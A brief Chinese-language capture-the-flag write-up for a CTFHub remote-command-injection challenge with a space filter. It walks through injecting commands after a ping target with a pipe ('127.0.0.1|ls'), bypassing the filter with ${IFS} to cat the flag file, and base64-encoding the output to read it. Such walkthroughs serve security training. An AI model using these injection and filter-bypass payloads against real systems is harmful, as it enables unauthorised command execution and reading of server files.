CTFHub-RCE 命令注入-过滤空格
-
观察源代码
- 代码里面可以发现过滤了空格
-
判断是Windows还是Linux
- 源代码中有
说明是Linuxping -c 4
- 源代码中有
-
查看有哪些文件
-
127.0.0.1|ls
-
-
打开flag文件
- 我们尝试将空格转义打开这个文件 利用 ${IFS}
127.0.0.1|cat${IFS}flag_195671031713417.php - 可是发现 文本内容显示不出来,所以怀疑可能编码格式问题,有些内容无法显示(同上一节)
- 我们尝试用base64编码
127.0.0.1|cat${IFS}flag_195671031713417.php|base64
- 再将内容base64 解码一下
- 成功获取flag
- 我们尝试将空格转义打开这个文件 利用 ${IFS}